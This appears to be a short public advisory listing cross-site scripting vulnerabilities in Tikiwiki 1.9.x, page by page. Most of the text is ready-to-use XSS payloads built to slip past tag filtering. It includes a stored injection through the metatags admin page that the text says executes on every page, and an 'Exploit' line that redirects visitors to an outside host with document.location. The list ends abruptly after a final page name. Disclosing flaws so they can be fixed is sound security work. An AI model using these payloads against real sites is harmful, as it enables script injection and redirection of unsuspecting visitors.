Multiple XSS Vulnerabilities in Tikiwiki 1.9.x
Discovered by Blwood
http://www.blwood.net
Public
Tiki-lastchanges
Tiki-orphan_pages.php
Tiki-listpages.php
Tiki-remind_password.php
http://tikiwiki.org/tiki-remind_password.php
"><scr<script>ipt>alert('Blwood')</scr</script>ipt>
Admin
Tiki-admin_include_metatags.php
http://www.site.com/tiki-admin.php?page=metatags
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
In all pages the source will be :
<meta name="keywords" content=""><script>alert('Blwood')</script>" />
The code will be executed in every pages !
Exploit :
"><sc<script>ript>document.location='http://www.blwood.net'</scr</script>ipt>
Tiki-admin_ressmodules.php
Tiki-syslog.php
Tiki-adminusers.php
In the Form :
"><scr<script>ipt>alert('Blwood')</scr</script>ipt>
Tiki-admin_hotwords.php
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
Tiki-admin_modules.php
Assign new module
Parameters : "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Create new user module
Name : "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Tiki-admin_notifications.php
Add notification :
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
Tiki-admin_dsn.php
Name : "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Dsn : "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Tiki-admin_content_templates.php
Create new template :
name: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Tiki-admin_chat.php